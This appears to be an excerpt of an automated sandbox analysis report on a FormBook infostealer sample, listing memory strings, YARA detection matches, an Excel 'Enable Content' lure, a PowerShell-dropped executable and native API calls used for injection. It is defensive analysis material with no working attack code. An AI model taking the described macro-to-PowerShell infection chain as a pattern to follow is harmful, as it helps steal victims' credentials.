Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000003.431695720.00000000063CD000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/I7s
Source: oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Kurst7D
Source: oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/S7
Source: oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: oftmhayq.exe, 00000019.00000003.434710127.00000000063F1000.00000004.00000001.sdmp String found in binary or memory: http://www.monotype.
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: oftmhayq.exe, 00000019.00000003.426739016.00000000063CD000.00000004.00000001.sdmp String found in binary or memory: http://www.sakkal.comc
Source: oftmhayq.exe, 00000019.00000003.426739016.00000000063CD000.00000004.00000001.sdmp String found in binary or memory: http://www.sakkal.como
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: oftmhayq.exe, 00000019.00000003.428314876.00000000063CD000.00000004.00000001.sdmp String found in binary or memory: http://www.urwpp.deX
Source: oftmhayq.exe, 00000019.00000003.428314876.00000000063CD000.00000004.00000001.sdmp String found in binary or memory: http://www.urwpp.deocS
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000014.00000002.438220332.000001D20BD39000.00000004.00000001.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000014.00000002.441451154.000001D21A613000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: oftmhayq.exe, 00000018.00000002.467569207.0000000000EBB000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 12 Screenshot OCR: Enable Content : lj, 5 6 7 " _ _ _="1 - 8 9 10 . . 11 " 12 Microsoft Excel X 13 14 ! Wa
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\oftmhayq.exe Jump to dropped file
Contains functionality to call native functions
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_00419D60 NtCreateFile, 29_2_00419D60
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_00419E10 NtReadFile, 29_2_00419E10
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_00419E90 NtClose, 29_2_00419E90
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_00419F40 NtAllocateVirtualMemory, 29_2_00419F40
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_00419E8A NtClose, 29_2_00419E8A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319910 NtAdjustPrivilegesToken,LdrInitializeThunk, 29_2_01319910
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013199A0 NtCreateSection,LdrInitializeThunk, 29_2_013199A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319860 NtQuerySystemInformation,LdrInitializeThunk, 29_2_01319860
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013195D0 NtClose,LdrInitializeThunk, 29_2_013195D0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319780 NtMapViewOfSection,LdrInitializeThunk, 29_2_01319780
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319660 NtAllocateVirtualMemory,LdrInitializeThunk, 29_2_01319660
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013196E0 NtFreeVirtualMemory,LdrInitializeThunk, 29_2_013196E0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319950 NtQueueApcThread, 29_2_01319950
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013199D0 NtCreateProcessEx, 29_2_013199D0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319820 NtEnumerateKey, 29_2_01319820
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0131B040 NtSuspendThread, 29_2_0131B040
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319840 NtDelayExecution, 29_2_01319840
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013198A0 NtWriteVirtualMemory, 29_2_013198A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013198F0 NtReadVirtualMemory, 29_2_013198F0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319B00 NtSetValueKey, 29_2_01319B00
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0131A3B0 NtGetContextThread, 29_2_0131A3B0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319A20 NtResumeThread, 29_2_01319A20
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319A10 NtQuerySection, 29_2_01319A10
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319A00 NtProtectVirtualMemory, 29_2_01319A00
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319A50 NtCreateFile, 29_2_01319A50
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319A80 NtOpenDirectoryObject, 29_2_01319A80
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0131AD30 NtSetContextThread, 29_2_0131AD30
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319520 NtWaitForSingleObject, 29_2_01319520
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319560 NtWriteFile, 29_2_01319560
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319540 NtReadFile, 29_2_01319540
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013195F0 NtQueryInformationFile, 29_2_013195F0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319730 NtQueryVirtualMemory, 29_2_01319730
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319710 NtQueryInformationToken, 29_2_01319710
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0131A710 NtOpenProcessToken, 29_2_0131A710
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0131A770 NtOpenThread, 29_2_0131A770
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319770 NtSetInformationFile, 29_2_01319770
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319760 NtOpenProcess, 29_2_01319760
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013197A0 NtUnmapViewOfSection, 29_2_013197A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319FE0 NtCreateMutant, 29_2_01319FE0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319610 NtEnumerateValueKey, 29_2_01319610
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319670 NtQueryInformationProcess, 29_2_01319670
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319650 NtQueryValueKey, 29_2_01319650
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013196D0 NtCreateKey, 29_2_013196D0
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_00419D60 NtCreateFile, 30_2_00419D60
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_00419E10 NtReadFile, 30_2_00419E10
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_00419E90 NtClose, 30_2_00419E90
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_00419F40 NtAllocateVirtualMemory, 30_2_00419F40
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_00419E8A NtClose, 30_2_00419E8A
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369910 NtAdjustPrivilegesToken,LdrInitializeThunk, 30_2_01369910
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013699A0 NtCreateSection,LdrInitializeThunk, 30_2_013699A0
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369860 NtQuerySystemInformation,LdrInitializeThunk, 30_2_01369860
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369840 NtDelayExecution,LdrInitializeThunk, 30_2_01369840
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013698F0 NtReadVirtualMemory,LdrInitializeThunk, 30_2_013698F0
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369A00 NtProtectVirtualMemory,LdrInitializeThunk, 30_2_01369A00
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369A50 NtCreateFile,LdrInitializeThunk, 30_2_01369A50
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013695D0 NtClose,LdrInitializeThunk, 30_2_013695D0
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369710 NtQueryInformationToken,LdrInitializeThunk, 30_2_01369710
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369780 NtMapViewOfSection,LdrInitializeThunk, 30_2_01369780
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369660 NtAllocateVirtualMemory,LdrInitializeThunk, 30_2_01369660
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013696E0 NtFreeVirtualMemory,LdrInitializeThunk, 30_2_013696E0
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369950 NtQueueApcThread, 30_2_01369950
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013699D0 NtCreateProcessEx, 30_2_013699D0
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369820 NtEnumerateKey, 30_2_01369820
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0136B040 NtSuspendThread, 30_2_0136B040
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013698A0 NtWriteVirtualMemory, 30_2_013698A0
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369B00 NtSetValueKey, 30_2_01369B00
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0136A3B0 NtGetContextThread, 30_2_0136A3B0
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369A20 NtResumeThread, 30_2_01369A20
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369A10 NtQuerySection, 30_2_01369A10
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369A80 NtOpenDirectoryObject, 30_2_01369A80
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0136AD30 NtSetContextThread, 30_2_0136AD30
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369520 NtWaitForSingleObject, 30_2_01369520
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369560 NtWriteFile, 30_2_01369560
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369540 NtReadFile, 30_2_01369540
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013695F0 NtQueryInformationFile, 30_2_013695F0
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369730 NtQueryVirtualMemory, 30_2_01369730
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0136A710 NtOpenProcessToken, 30_2_0136A710
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0136A770 NtOpenThread, 30_2_0136A770
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369770 NtSetInformationFile, 30_2_01369770
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369760 NtOpenProcess, 30_2_01369760
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013697A0 NtUnmapViewOfSection, 30_2_013697A0
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369FE0 NtCreateMutant, 30_2_01369FE0
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369610 NtEnumerateValueKey, 30_2_01369610
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369670 NtQueryInformationProcess, 30_2_01369670
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369650 NtQueryValueKey, 30_2_01369650
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013696D0 NtCreateKey, 30_2_013696D0
Detected potential crypto function
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_02A9C134 24_2_02A9C134
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_02A9E568 24_2_02A9E568
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_02A9E578 24_2_02A9E578
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_05BBD4B8 24_2_05BBD4B8
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_05BBB368 24_2_05BBB368
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_05BB1290 24_2_05BB1290
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_05BB9F90 24_2_05BB9F90
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_05BBC9A0 24_2_05BBC9A0
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_05BB1AB8 24_2_05BB1AB8
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_05BB1AA9 24_2_05BB1AA9
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_071F5D38 24_2_071F5D38
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_071F2920 24_2_071F2920
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_071F21B0 24_2_071F21B0
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_071F0040 24_2_071F0040
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_071F3630 24_2_071F3630
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_0730C5B8 24_2_0730C5B8
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_0730BCE8 24_2_0730BCE8
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_0730E050 24_2_0730E050
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_07302F05 24_2_07302F05
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_073017FA 24_2_073017FA
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_07302A55 24_2_07302A55
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_07300128 24_2_07300128
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_07300145 24_2_07300145
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_0730B9A0 24_2_0730B9A0
Source: C:\Users\Public\oftmhayq.exe Code function: 25_2_0188C134 25_2_0188C134
Source: C:\Users\Public\oftmhayq.exe Code function: 25_2_0188E568 25_2_0188E568
Source: C:\Users\Public\oftmhayq.exe Code function: 25_2_0188E578 25_2_0188E578
Source: C:\Users\Public\oftmhayq.exe Code function: 25_2_074BED10 25_2_074BED10
Source: C:\Users\Public\oftmhayq.exe Code function: 25_2_074B2B58 25_2_074B2B58
Source: C:\Users\Public\oftmhayq.exe Code function: 25_2_074B2B49 25_2_074B2B49
Source: C:\Users\Public\oftmhayq.exe Code function: 25_2_074B28F8 25_2_074B28F8
Source: C:\Users\Public\oftmhayq.exe Code function: 25_2_074B28A8 25_2_074B28A8
Source: C:\Users\Public\oftmhayq.exe Code function: 25_2_07AD5D38 25_2_07AD5D38
Source: C:\Users\Public\oftmhayq.exe Code function: 25_2_07AD21B0 25_2_07AD21B0
Source: C:\Users\Public\oftmhayq.exe Code function: 25_2_07AD0040 25_2_07AD0040
Source: C:\Users\Public\oftmhayq.exe Code function: 25_2_07AD3630 25_2_07AD3630
Source: C:\Users\Public\oftmhayq.exe Code function: 25_2_07BEC5B8 25_2_07BEC5B8
Source: C:\Users\Public\oftmhayq.exe Code function: 25_2_07BEBCE8 25_2_07BEBCE8
Source: C:\Users\Public\oftmhayq.exe Code function: 25_2_07BEE050 25_2_07BEE050
Source: C:\Users\Public\oftmhayq.exe Code function: 25_2_07BEB9A0 25_2_07BEB9A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_00401030 29_2_00401030
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0041D96D 29_2_0041D96D
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0041DAB1 29_2_0041DAB1
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0041DCBF 29_2_0041DCBF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_00402D88 29_2_00402D88
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_00402D90 29_2_00402D90
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_00409E40 29_2_00409E40
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_00409E3B 29_2_00409E3B
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0041DF98 29_2_0041DF98
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0041CFA3 29_2_0041CFA3
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_00402FB0 29_2_00402FB0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F4120 29_2_012F4120
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012DF900 29_2_012DF900
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F99BF 29_2_012F99BF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F2990 29_2_012F2990
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EC1C0 29_2_012EC1C0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013AE824 29_2_013AE824
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA830 29_2_012FA830
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D6800 29_2_012D6800
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130701D 29_2_0130701D
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391002 29_2_01391002
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013020A0 29_2_013020A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A20A8 29_2_013A20A8
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EB090 29_2_012EB090
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013960F5 29_2_013960F5
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A28EC 29_2_013A28EC
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A2B28 29_2_013A2B28
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139231B 29_2_0139231B
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA309 29_2_012FA309
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F3360 29_2_012F3360
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FAB40 29_2_012FAB40
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0137CB4F 29_2_0137CB4F
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130EBB0 29_2_0130EBB0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FEB9A 29_2_012FEB9A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130138B 29_2_0130138B
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0137EB8A 29_2_0137EB8A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01328BE8 29_2_01328BE8
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013823E3 29_2_013823E3
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013903DA 29_2_013903DA
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130ABD8 29_2_0130ABD8
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139DBD2 29_2_0139DBD2
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0138FA2B 29_2_0138FA2B
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FB236 29_2_012FB236
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01395A4F 29_2_01395A4F
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A32A9 29_2_013A32A9
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A22AE 29_2_013A22AE
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01394AEF 29_2_01394AEF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139E2C5 29_2_0139E2C5
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D0D20 29_2_012D0D20
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A2D07 29_2_013A2D07
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A1D55 29_2_013A1D55
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F2D50 29_2_012F2D50
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013065A0 29_2_013065A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01302581 29_2_01302581
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01392D82 29_2_01392D82
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012ED5E0 29_2_012ED5E0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A25DD 29_2_013A25DD
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F2430 29_2_012F2430
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E841F 29_2_012E841F
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139CC77 29_2_0139CC77
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FB477 29_2_012FB477
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139D466 29_2_0139D466
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01394496 29_2_01394496
